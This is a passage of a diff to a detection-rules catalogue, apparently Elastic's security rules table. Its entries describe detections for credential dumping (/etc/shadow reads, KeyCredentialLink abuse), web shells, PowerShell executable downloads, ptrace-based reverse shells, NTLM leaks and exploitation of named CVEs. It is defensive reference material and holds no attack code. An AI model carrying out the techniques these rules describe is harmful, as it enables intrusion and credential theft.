TLS connections to external destinations where the server presents a recently issued, likely self-signed certificate whose issuer and subject distinguished names are equal. C2 frameworks frequently use freshly generated self-signed certificates instead of publicly trusted CAs. This behavioral logic complements hash-based C2 certificate rules, such as default Cobalt Strike team-server certificates, by catching rotated or custom infrastructure that does not reuse default tooling certificates. Distinguished-name equality identifies self-issued certificates but does not cryptographically prove that the certificate signed itself. The rule does not cover private-CA signed certificates, where issuer and subject differ, or C2 that uses publicly trusted certificates such as Let's Encrypt. |[Domain: Network], [Use Case: Network Security Monitoring], [Use Case: Threat Detection], [Tactic: Command and Control], [Rule Type: ESQL], [Data Source: Network Packet Capture], [Data Source: Network Traffic], [Resources: Investigation Guide] |None |2 + |<> |Identify the modification of the msDS-KeyCredentialLink attribute in an Active Directory Computer or User Object. Attackers can abuse control over the object and create a key pair, append to raw public key in the attribute, and obtain persistent and stealthy access to the target user or computer object. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs] |None |219 |<> |Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |213 @@ -2776,7 +2792,7 @@ and their rule type is `machine_learning`. |<> |Identifies potential exploitation of a Telnet remote authentication bypass vulnerability (CVE-2026-24061) in GNU Inetutils telnetd. The vulnerability allows unauthenticated access by supplying a crafted `-f ` value via the `USER` environment variable, resulting in a login process spawned with elevated privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne] |None |3 -|<> |Identifies the modification of a file creation time for executable files in sensitive system directories. Adversaries may modify file time attributes to blend malicious executables with legitimate system files. Timestomping is a technique that modifies the timestamps of a file often to mimic files that are in trusted directories. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Sysmon], [Resources: Investigation Guide] |None |111 +|<> |Identifies the modification of a file creation time for executable files in sensitive system directories. Adversaries may modify file time attributes to blend malicious executables with legitimate system files. Timestomping is a technique that modifies the timestamps of a file often to mimic files that are in trusted directories. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Sysmon], [Resources: Investigation Guide] |None |112 |<> |Identifies potential exploitation of CVE-2025-53770 and CVE-2025-53771 in IIS web servers on SharePoint sites. Toolshell is an exploit chain that leverages vulnerabilities in SharePoint/IIS to gain unauthorized access and execute commands. This rule detects HTTP requests that match specific patterns indicative of the exploit attempt. |[Domain: Network], [Tactic: Initial Access], [Use Case: Exploit Detection], [Data Source: Network Traffic], [Data Source: Network Traffic HTTP Logs], [Rule Type: BBR] |None |1 @@ -2796,8 +2812,6 @@ and their rule type is `machine_learning`. |<> |Identifies a potential Windows Server Update Services (WSUS) abuse to execute psexec to enable for lateral movement. WSUS is limited to executing Microsoft signed binaries, which limits the executables that can be used to tools published by Microsoft. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Data Source: Windows Security Event Logs], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |213 -|<> |Identifies the creation of ASPX files in specific directories that are commonly targeted by attackers to deploy web shells. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |4 - |<> |Identifies successful exploitation of CVE-2023-50164, a critical path traversal vulnerability in Apache Struts 2 file upload functionality. This high-fidelity rule detects a specific attack sequence where a malicious multipart/form-data POST request with WebKitFormBoundary is made to a Struts .action upload endpoint, immediately followed by the creation of a JSP web shell file by a Java process in Tomcat's webapps directories. This correlated activity indicates active exploitation resulting in remote code execution capability through unauthorized file upload and web shell deployment. |[Domain: Endpoint], [Domain: Web], [Domain: Network], [OS: Linux], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Network Traffic], [Resources: Investigation Guide] |None |4 |<> |This rule uses alert data to determine when a malware signature is triggered in multiple hosts. Analysts can use this to prioritize triage and response, as this can potentially indicate a widespread malware infection. |[Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Threat Detection], [Tactic: Execution], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |7 @@ -2910,6 +2924,8 @@ and their rule type is `machine_learning`. |<> |Identifies the use of built-in tools attackers can use to discover running processes on an endpoint. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend], [Data Source: Elastic Endgame] |None |7 +|<> |Detects a process execution followed by immediate self-deletion, a common technique used by adversaries to remove traces of their activity on the system. This pattern is often observed in malware and APT campaigns. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |320 |<> |Elastic Endgame detected Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 @@ -2958,9 +2974,9 @@ and their rule type is `machine_learning`. |<> |Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. |[Domain: Endpoint], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 -|<> |This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Initial Access], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: Network Traffic], [Data Source: PAN-OS], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |112 +|<> |This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Initial Access], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: Fortinet], [Data Source: Network Traffic], [Data Source: PAN-OS], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |113 -|<> |This rule detects network events that may indicate the use of RPC traffic to the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Initial Access], [Tactic: Lateral Movement], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |111 +|<> |This rule detects network events that may indicate the use of RPC traffic to the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Initial Access], [Tactic: Lateral Movement], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: Fortinet], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |112 |<> |This rule leverages the new_terms rule type to identify the installation of RPM packages by an unusual parent process. RPM is a package management system used in Linux systems such as Red Hat, CentOS and Fedora. Attacks may backdoor RPM packages to gain initial access or install malicious RPM packages to maintain persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 @@ -2976,7 +2992,7 @@ and their rule type is `machine_learning`. |<> |A machine learning job detected an unusual error in a CloudTrail message. These can be byproducts of attempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |None |212 -|<> |Identifies rare connection attempts to a Web Distributed Authoring and Versioning (WebDAV) resource. Attackers may inject WebDAV paths in files or features opened by a victim user to leak their NTLM credentials via forced authentication. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |10 +|<> |Identifies rare connection attempts to a Web Distributed Authoring and Versioning (WebDAV) resource. Attackers may inject WebDAV paths in files or features opened by a victim user to leak their NTLM credentials via forced authentication. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |11 |<> |This rule detects rare internet network connections via the SMB protocol. SMB is commonly used to leak NTLM credentials via rogue UNC path injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |214 @@ -3008,7 +3024,7 @@ and their rule type is `machine_learning`. |<> |Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |320 -|<> |Identifies powershell.exe being used to download an executable file from an untrusted remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |116 +|<> |Identifies PowerShell being used to download an executable file from an untrusted remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |117 |<> |Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon] |None |216 @@ -3016,7 +3032,7 @@ and their rule type is `machine_learning`. |<> |Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect. This behavior may indicate abuse where an attacker triggers an MSI install then connects via a guest link with a known session key. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike], [Data Source: Windows Security Event Logs], [Data Source: Elastic Endgame] |None |4 -|<> |Detects use of the systemsetup command to enable remote SSH Login. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |112 +|<> |Detects use of the systemsetup command to enable remote SSH Login. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |113 |<> |Identifies remote scheduled task creations on a target host. This could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne] |None |215 @@ -3042,19 +3058,23 @@ and their rule type is `machine_learning`. |<> |Identifies instances where GDB (granted the CAP_SYS_PTRACE capability) is executed, after which an outbound network connection is initiated by UID/GID 0 (root). In Linux, the CAP_SYS_PTRACE capability grants a process the ability to use the ptrace system call, which is typically used for debugging and allows the process to trace and control other processes. Attackers may leverage this capability to hook and inject into a process that is running with root permissions in order to execute shell code and gain a reverse shell with root privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 -|<> |Detects a Roshal Archive (RAR) file or PowerShell script downloaded from the internet by an internal host. Gaining initial access to a system and then downloading encoded or encrypted tools to move laterally is a common practice for adversaries as a way to protect their more valuable tools and tactics, techniques, and procedures (TTPs). This may be atypical behavior for a managed network and can be indicative of malware, exfiltration, or command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |108 +|<> |Detects a Roshal Archive (RAR) file or PowerShell script downloaded from the internet by an internal host. Gaining initial access to a system and then downloading encoded or encrypted tools to move laterally is a common practice for adversaries as a way to protect their more valuable tools and tactics, techniques, and procedures (TTPs). This may be atypical behavior for a managed network and can be indicative of malware, exfiltration, or command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint], [Data Source: Fortinet], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |109 |<> |This rule detects the creation or renaming of the SELinux configuration file. SELinux is a security module that provides access control security policies. Modifications to the SELinux configuration file may indicate an attempt to impair defenses by disabling or modifying security tools. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |105 |<> |Identifies modifications to the registered Subject Interface Package (SIP) providers. SIP providers are used by the Windows cryptographic system to validate file signatures on the system. This may be an attempt to bypass signature validation checks or inject code into critical processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |316 -|<> |This rule detects network events that may indicate inbound Windows file sharing (SMB or CIFS) traffic originating from the Internet. SMB should never be directly reachable from the Internet, as it is a primary target for exploitation by threat actors seeking initial access. Inbound SMB from a public IP is a direct precondition for attacks such as EternalBlue (MS17-010) and related SMB remote code execution vulnerabilities. |[Tactic: Initial Access], [Domain: Network], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |1 +|<> |This rule detects network events that may indicate inbound Windows file sharing (SMB or CIFS) traffic originating from the Internet. SMB should never be directly reachable from the Internet, as it is a primary target for exploitation by threat actors seeking initial access. Inbound SMB from a public IP is a direct precondition for attacks such as EternalBlue (MS17-010) and related SMB remote code execution vulnerabilities. |[Tactic: Initial Access], [Domain: Network], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: Fortinet], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |2 -|<> |This rule detects network events that may indicate the use of Windows file sharing (also called SMB or CIFS) traffic to the Internet. SMB is commonly used within networks to share files, printers, and other system resources amongst trusted systems. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector or for data exfiltration. |[Tactic: Initial Access], [Tactic: Exfiltration], [Domain: Network], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |112 +|<> |This rule detects network events that may indicate the use of Windows file sharing (also called SMB or CIFS) traffic to the Internet. SMB is commonly used within networks to share files, printers, and other system resources amongst trusted systems. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector or for data exfiltration. |[Tactic: Initial Access], [Tactic: Exfiltration], [Domain: Network], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: Fortinet], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |113 |<> |Identifies potentially suspicious processes that are not trusted or living-off-the-land binaries (LOLBin) making Server Message Block (SMB) network connections over port 445. Windows File Sharing is typically implemented over SMB, which communicates between hosts using port 445. Legitimate connections are generally established by the kernel (PID 4). This rule helps to detect processes that might be port scanners, exploits, or user-level processes attempting lateral movement within the network by leveraging SMB connections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |117 -|<> |This rule detects events that may indicate use of SMTP on TCP port 26 from an internal host to an external destination. This port is commonly used by several popular mail transfer agents to deconflict with the default SMTP port 25. This port has also been used by a malware family called BadPatch for command and control of Windows systems. The rule is scoped to outbound traffic (internal source to external destination) to focus on the command and control and exfiltration use cases, rather than benign internal mail relays or unrelated transit traffic observed by the sensor. |[Tactic: Command and Control], [Tactic: Exfiltration], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |113 +|<> |This rule detects events that may indicate use of SMTP on TCP port 26 from an internal host to an external destination. This port is commonly used by several popular mail transfer agents to deconflict with the default SMTP port 25. This port has also been used by a malware family called BadPatch for command and control of Windows systems. The rule is scoped to outbound traffic (internal source to external destination) to focus on the command and control and exfiltration use cases, rather than benign internal mail relays or unrelated transit traffic observed by the sensor. |[Tactic: Command and Control], [Tactic: Exfiltration], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: Corelight], [Data Source: Fortinet], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |114 + +|<> |Identifies the macOS Screen Sharing file copy helper SSFileCopyReceiver creating or modifying files in common persistence locations, including system-wide and per-user LaunchDaemons/LaunchAgents, shell profiles, SSH authorized_keys, cron tabs, and hidden paths under root's home directory. SSFileCopyReceiver performs file writes with root authority on behalf of a remote viewer.Pre-authentication exploitation of the Screen Sharing service (CVE-2026-65400) abuses this write primitive to establish persistence; observed in-the-wild activity dropped LaunchDaemons and modified shell startup files to run a cryptocurrency miner as root. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 + +|<> |Identifies execution of the macOS Screen Sharing file-copy helper SSFileCopySender with root UID/GID attributes (0 80). Under the native Apple authentication path this helper runs in the connecting user's context; execution as root is anomalous and consistent with pre-authentication exploitation of the Screen Sharing service (CVE-2026-65400), where a flawed SRP validation path lets an unauthenticated attacker reach privileged file operations. Note that the 0/80 UID/GID pair reflects only initial exploitation attempts and can be evaded once an attacker enumerates another local account. It is advisable to treat this as a tripwire and pair it with the SSFileCopyReceiver Writing to Common Persistence Locations rule coverage. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Initial Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 |<> |The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |210 @@ -3100,7 +3120,7 @@ and their rule type is `machine_learning`. |<> |Detects when a sensitive file is accessed followed by the immediate creation of a compressed file in a suspicious location. This activity can indicate an attempt to collect sensitive local data and stage it for exfiltration. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 -|<> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |215 +|<> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |216 |<> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations inside a container. |[Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Collection], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 @@ -3252,7 +3272,7 @@ and their rule type is `machine_learning`. |<> |Detects PowerShell scripts that invoke Reflection.Assembly or Assembly.Load to load .NET assemblies. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |None |322 -|<> |Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Credential Access], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |8 +|<> |Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Credential Access], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |9 |<> |Detects suspicious process events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide], [Data Source: Crowdstrike] |None |111 @@ -3280,6 +3300,8 @@ and their rule type is `machine_learning`. |<> |Detects attempts to exploit privilege escalation vulnerabilities related to the Adobe Acrobat Reader PrivilegedHelperTool responsible for installing updates. For more information, refer to CVE-2020-9615, CVE-2020-9614 and CVE-2020-9613 and verify that the impacted system is patched. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |110 +|<> |Detects suspicious child process execution originating from PaperCut server components, including the PaperCut NG/MF Application Server (pc-app.exe) and PaperCut Hive print job spooler (pc-printjob-spooler.exe). Active exploitation of CVE-2026-82078 and CVE-2026-81578 abuses unsafe dynamic class loading and an authentication bypass to achieve pre-authenticated remote code execution under pc-app.exe. Similar suspicious shell spawning has also been observed from PaperCut Hive's pc-printjob-spooler.exe (for example cmd.exe executing echo/test-style commands). Observed NG/MF in-the-wild activity includes discovery utilities such as whoami and tasklist; proof-of-concept exploitation has spawned unexpected Windows utilities such as charmap.exe as SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Sysmon], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1 + |<> |Identifies a suspicious process executing as a descendant of the Azure VM CustomScript extension handler (CustomScriptHandler.exe) on a Windows host. The Azure CustomScript extension runs an attacker-supplied script with high privilege (SYSTEM) via the guest agent, and is a common cloud-to-host code-execution and persistence primitive. Because the extension's resource name is attacker-controlled and absent from on-host telemetry, this rule anchors on the type-bearing handler binary ('Microsoft.Compute.CustomScriptExtension\...\CustomScriptHandler.exe') rather than the spoofable extension name, making it resistant to renaming. CustomScript legitimately launches PowerShell and cmd, so the rule fires only when the descendant is an execution-proxy, download, or discovery LOLBin, or PowerShell exhibiting suspicious tradecraft. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 |<> |Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |322 @@ -3360,6 +3382,8 @@ and their rule type is `machine_learning`. |<> |Detects Inter-Process Communication with Outlook via Component Object Model from an unusual process. Adversaries may target user email to collect sensitive information or send email on their behalf via API. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |13 +|<> |Detects creation of Java .class files within the PaperCut NG/MF Application Server library directory. During active exploitation of CVE-2026-82078 (chained with CVE-2026-81578), attackers deliver hex-encoded malicious .class payloads into the PaperCut server/lib path (observed examples include Udydn.class and Moo97.class) so arbitrary bytecode executes inside the PaperCut JVM / Application Server process. |[Domain: Endpoint], [OS: Windows], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Initial Access], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Detects execution of JavaScript via Deno with suspicious command-line patterns (base64, eval, http, or import in a javascript context). Adversaries may abuse Deno to run malicious JavaScript for execution or staging. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |4 |<> |Identifies suspicious processes being spawned by the JetBrain TeamCity process. This activity could be related to JetBrains remote code execution vulnerabilities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Microsoft Defender XDR], [Data Source: Windows Security Event Logs], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |210 @@ -3432,6 +3456,8 @@ and their rule type is `machine_learning`. |<> |Identifies when a process is created and immediately accessed from an unknown memory code region and by the same parent process. This may indicate a code injection attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Sysmon] |None |312 +|<> |Identifies suspicious process execution associated with the Zoom desktop client on macOS and Linux. The rule detects shells, script interpreters, downloaders, and network utilities spawned by Zoom on either platform. On Linux, it also detects Zoom replacing its own process image with an executable outside the Zoom installation directory. These behaviors may indicate successful exploitation of a Zoom client vulnerability, including CVE-2026-53413. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |1 + |<> |Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike] |None |219 |<> |Detects the 